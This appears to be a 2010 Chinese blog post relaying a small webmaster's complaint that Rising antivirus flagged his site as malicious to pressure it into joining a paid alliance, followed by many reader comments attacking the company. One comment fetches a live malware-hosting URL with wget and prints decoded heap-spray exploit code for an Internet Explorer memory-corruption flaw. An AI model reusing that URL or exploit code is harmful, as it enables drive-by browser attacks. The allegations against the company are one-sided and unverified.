新增一个"活在中国"栏目。
专门刊登生活在这个国家的真实经历,欢迎大家赐文。
今天刊登的是,"羊城网"小劳站长的来信。从他的经历可以看到,中国的小站长们,不仅要遭受政策压力,还会受到其他的欺压。
=======================
一峰,
我们又遇到麻烦了。
2月3日,我们接连收到网友报告,称网站被瑞星防火墙屏蔽了。
我们联系瑞星公司,客服建议我们通过该公司的在线工具进行安全检测。结果显示,有两条URL被挂马。
经查看,该两个网页并无任何异常,也无任何连接指向该工具所称的木马网址。其他公司的安全产品(包括诺顿、安全360等)亦无告警。但为了保险起见,我们还是删除了上述两个网页。但删除后,瑞星的防火墙仍然称我们的网站为恶意网站。而通过该工具检测其他一些主流门户网站时,发现新浪、搜狐、网易被"挂马"的URL数量远远高于我们,但瑞星防火墙却并无任何有关恶意网站的提示。
瑞星公司的客服人员建议我们加入"瑞星云安全网站联盟"、挂载该公司提供的监测代码,暗示与其合作,问题就会解决。
至此,我们终于看出了其中的猫腻,瑞星公司的行为实际上是对一些中小网站进行施压,在每个网页挂载它的代码,相当于免费帮它卖广告。至于下一步它会怎样利用这些代码(收集用户信息?),就无从得知了。
另一方面,瑞星公司自己的网站,去年七月份就曾被黑客攻击并挂载木马,并且瑞星杀毒软件上月亦曝出存在高危漏洞,显然不能指望它来保护我们。如果我们挂了该公司的代码,反而有可能造成安全隐患。
此外,最近《北京晚报》的报道《北京网监处长受贿1400余万办假案受审 承认帮瑞星公司抓人》,曝光了瑞星公司行贿原北京市公安局网监处处长,通过假报案、假损失、假鉴定的手法陷害竞争对手。这种公司的商业诚信,是令人质疑的。
因此,我们最后决定,不与其合作,不参与"瑞星云安全网站联盟",并建议所有瑞星防火墙的用户卸载该产品。但是,单单靠我们一家小网站,确实难以与瑞星这种庞然大物对抗,希望通过您的网志让更多的网友了解此事。
羊城网 小劳
2009年2月4日
(完)
superbass 说:
瑞星太可恶,微点公司的产品本来应该是很有前途的(虽然在天朝,做得好的话都会被安全部门盯上,最后像360一样成为用户机器上的一个大后门),一批有才华、有创意的开饭人员和他们的领导者,从05年起无端蒙冤至今才算昭雪,现在产品推出的话,估计是没什么机会了,因为类似的防毒理念各大杀毒软件已经都实现了
2010年2月 7日 12:56 | # | 引用
米店老板 说:
我对瑞星一直嗤之以鼻,这个败类居然祸害大了,真是没天理。
2010年2月 7日 12:57 | # | 引用
hc 说:
好人不长命,祸害一万年~
2010年2月 7日 13:03 | # | 引用
just 说:
国内的这些公司都有娱乐化和被娱乐化的倾向
大家也各得其乐
2010年2月 7日 13:04 | # | 引用
thunder 说:
瑞星确实差的要命。。。。
2010年2月 7日 13:26 | # | 引用
希锐亚 说:
最近的贴子充满了爆点。(*^_^*)
强贴留名,我要看能盖几楼。
2010年2月 7日 13:48 | # | 引用
poboat 说:
娱乐公司
2010年2月 7日 14:14 | # | 引用
jun 说:
我现在比较喜欢用360杀毒软件。
2010年2月 7日 14:21 | # | 引用
路人甲 说:
俺这里用的avast5.0,打开了小劳的网站,开了好些个页面,都没有发现什么问题。
哈,有趣啊瑞星。
居然跟百度、360一个X样。
2010年2月 7日 14:24 | # | 引用
一块红布 说:
对瑞星无语很久了
2010年2月 7日 14:44 | # | 引用
ware 说:
去瑞星公司:
一哭二闹三上吊
实在不行:
把花圈扔瑞星去
2010年2月 7日 15:11 | # | 引用
LRZ 说:
……对瑞星已经没什么好说的了。就一黑社会,包括但不限于网络。
反而我对【活在中国】很有兴趣,在神奇而和谐的天朝,“与国际接轨”之下的“中国特色”很值得玩味啊!
2010年2月 7日 15:26 | # | 引用
maobama 说:
从来没装过瑞星,以后也不会用。
2010年2月 7日 15:43 | # | 引用
11111343 说:
可以联合上告,瑞星滥用自己的垄断地位损害其他行业的名誉和权益,并为自己谋取不当利益
这就和广告说别人这有问题那有问题自己无问题一样,属于违法广告
2010年2月 7日 16:04 | # | 引用
rupinetree 说:
我用过一段时间瑞星,瑞星杀毒软件+瑞星防火墙,用起来非常吃系统配置的
再说句不沾边的,没有任何理由让我在电脑上装上这个软件。chrome再吃配置,但它的浏览体验没的说,也不像这软件这么鸡肋。还这么没品!
恕我无才,居然拿Google的软件和瑞星的比。
2010年2月 7日 16:27 | # | 引用
fisio 说:
大家没事儿千万别拿瑞星那个检测工具去查自己的网站,免得被记录为潜在客户。对这种超越了无耻的企业,没有什么是不可能的
2010年2月 7日 17:50 | # | 引用
Jack 说:
离它越远越好,千万别靠近了,从自己做起吧。国内就这情况,满腔热血无奈我也只能看看热闹。
2010年2月 7日 18:42 | # | 引用
Landon 说:
咱身边怎么老出这种败类,太无耻了。
2010年2月 7日 18:51 | # | 引用
zz 说:
遇到此问题就跟网友说瑞星是垃圾公司 赶紧卸掉
2010年2月 7日 18:52 | # | 引用
痛打落水狗 说:
自从某星与卡巴斯基打口水仗,演了一场闹剧,它的名声就在不断下滑。现在又爆出这类事情,某星的公关又要忙了,小心枪手顶上你。
2010年2月 7日 19:20 | # | 引用
snowmanjl 说:
360和瑞星叼着对方的毛发怒目而视~
2010年2月 7日 21:51 | # | 引用
Weber 说:
谁还用瑞星呀,国产的杀毒软件我基本不用,卡巴不用(此物貌似很好很强大,其实不然)。
2010年2月 7日 22:26 | # | 引用
汗青小卷 说:
惨了 我购买了瑞星的了。。哎 闷了
2010年2月 7日 23:00 | # | 引用
小劳 说:
事实上,我们在这个时候发表这份声讨瑞星声明,多少都有些担心会否卷入瑞星和360的口水战,但始终这件事的曝光并不仅仅是针对瑞星,而是更加让大家警惕,在国内互联网政治和商业环境的双重压力下,每一个网站每一个网民都有可能成为温水青蛙。正如韩寒所说,通往朝鲜之路,是每一个沉默的人铺就的……
2010年2月 7日 23:25 | # | 引用
xiaofeilong 说:
2010年2月 8日 00:01 | # | 引用
Satantara 说:
瑞星就是娱乐公司啊,不信去google
2010年2月 8日 01:06 | # | 引用
haohao 说:
瑞星这东西。。。最近名声越来越臭了。
估计不久快倒闭了。
持股票的快抛咯。
2010年2月 8日 01:37 | # | 引用
fi 说:
无耻的娱乐公司
2010年2月 8日 08:47 | # | 引用
驱风老怪 说:
很多朋友让我帮忙修电脑,只要看到瑞星,我一定帮他们卸载。
2010年2月 8日 09:44 | # | 引用
yuanjin 说:
国内的杀软也好,antispyware也好统统都是我不信任的东西,大家趁早上windows以外的操作系统吧!
2010年2月 8日 10:52 | # | 引用
半就业 说:
瑞星的查毒速度奇慢。我当时后悔买它,价格也不便宜。现在用金山,还可以。有些人劝我用卡巴,还没试过。不知道还有什么比较好的杀毒软件,大家推荐下。
2010年2月 8日 11:38 | # | 引用
呵呵 说:
这个栏目好,把那些丑恶的现象都展示出来。顺便鄙视下瑞星。
2010年2月 8日 12:25 | # | 引用
USB 说:
以前知道有瑞星,装上之后太烂,就删掉了。
之后再也没有用过瑞星。中国人的良心都跑哪里去了,难道经济发展一定都需要用道德沦丧来作为交换吗?
2010年2月 8日 12:47 | # | 引用
樵夫 说:
如果是热爱自由的开发者,我的看法还是DIY一下某个喜欢的linux发行版吧
2010年2月 8日 16:23 | # | 引用
Joey 说:
我一直都用的瑞星。俺也不太懂技术,不知道卸载后,装什么好呢??请高手指点下,不胜感激。
2010年2月 8日 18:30 | # | 引用
一或九 说:
无意攻击那些还在用瑞星的朋友。。包括360。。。但是我要说的是。你们真的很弱智。。
国产软件。。能不用的就尽量别用吧。。
最著名的暴风影音断网事件。。一个播放器,在用户不知情的情况下一直访问网络。。。
QQ。。用的人太多了。。请自行Google:“QQ 老大哥 监视”
pplive。。也算个有名的软件了。。。安装以后。。请自己看看后台的进程。。(我指在退出pplive后看)。。
而目前中国病毒木马横行。。杀毒软件不同于普通软件。。。更为重要。。而且杀毒软件是开机就启动。。长住内存。。。这么重要的软件。。都敢用国产。。我真的很无语。。。
瑞星的案子。。奥运会的时候好像就公布了(号称奥运会用的杀毒软件就是受到瑞星迫害的微点公司的产品)。。。诚信差到如此的公司的产品居然还有人在用?!!
当然本人也不推荐用微点公司的产品。。。用国外的杀毒软件吧。。选择还是很多的。。
2010年2月 9日 00:47 | # | 引用
史诗在线 说:
gznf.net
摘要
“诺顿网页安全”未发现该站点存在任何问题。
•计算机威胁: 0
•身份威胁: 0
•讨厌因素: 0
该站点上的威胁总数: 0
还有,谁能解释一下那段代码的含义,难道技术进步了,那么短的一段代码就可以杀毒了?
2010年2月 9日 02:40 | # | 引用
史诗在线 说:
有些网站是这么说的:您搜索的网站已经加盟瑞星云安全网站联盟,只有本站的站长才能查看该站的安全情况。
这里一定有大问题,“我瑞星,我2B啊”。
2010年2月 9日 02:55 | # | 引用
x 说:
quote: "新增一个“活在中国”栏目。
专门刊登生活在这个国家的真实经历,欢迎大家赐文。"
-------------
阮老师,如果有生活在中国的正面经历,可以投稿吗?
2010年2月 9日 06:11 | # | 引用
初来 说:
联想好像和瑞星是一伙的,专门给刚买他们电脑没什么经验的人推荐一起买瑞星。然后就发现一个很不好的现象,比如我买了一年12个月的瑞星产品,10个月过去了如果我不续买他们的杀毒软件,第11、12个月我的电脑里就会出现一些小病小毒,我同学和我差不多同时买的,同样的情况,这事当时就觉得蹊跷,怀疑是瑞星故意的。
2010年2月 9日 10:10 | # | 引用
faint 说:
普通Windows用户,推荐Avira AntiVir或者Avast或者NOD32,都比瑞星强,另外,安全意识也是非常重要的
2010年2月 9日 12:38 | # | 引用
flier 说:
从技术上来说,瑞星这个还真没有误报,虽然他们的做法比较不专业
$ wget http://wvvv.wwvv.us/images/css/dom.htm
2010-02-09 13:51:37 (186 KB/s) - `dom.htm' saved [132993/132993]
内容是一个利用heap spray和CVE-2010-0249 Microsoft IE Malform Event Operate Memory Corruption漏洞的攻击代码,混淆机制是在正常html里面掺杂\0字符。
解码后大概内容类似
function ev1(evt)
{
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2()
{ p="\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u
0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c
0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d";
for (i = 0; i < x1.length; i ++ )
{
x1[i].data = p;
};
var t = e1.srcElement;
}
</script>
<span id="sp1"><IMG SRC="mm.gif" onload="ev1(event)"></span>
2010年2月 9日 13:56 | # | 引用
张昭 说:
就是闵行紫竹科技园区的瑞星?
2010年2月 9日 20:05 | # | 引用
jing 说:
鄙视一下!
2010年2月10日 21:31 | # | 引用
fisher 说:
天朝的工具
2010年2月10日 22:24 | # | 引用
蜗牛 说:
最近360跟瑞星咬的正紧 狗咬狗一嘴毛
不好好做技术 成天打嘴皮子杖 也不知道过的哪门子瘾
2010年2月11日 11:52 | # | 引用
Andi 说:
用MSE的飘过……自从不小心用了一次瑞星之后就完全被恶心到~
2010年2月12日 14:22 | # | 引用
品味 说:
刚看了韩寒与胡戈等人的新作《宅居动物》,充分感受到上述网友的苦楚,建议大家有空看看。
2010年2月15日 16:09 | # | 引用
w 说:
ESET报告这个网页被挂马
2010年2月22日 00:54 | # | 引用
atlas 说:
普通Windows用户,推荐Avira AntiVir,就是小红伞
2010年2月26日 23:26 | # | 引用
nv 说:
同LS, ESET报马了, 这个页面, how?
2010年5月 4日 23:28 | # | 引用
kit 说:
我用avast
2010年6月 2日 18:57 | # | 引用
keren 说:
上面留言有个木马样本,每次转到这个页面都要报马
2010年7月11日 14:58 | # | 引用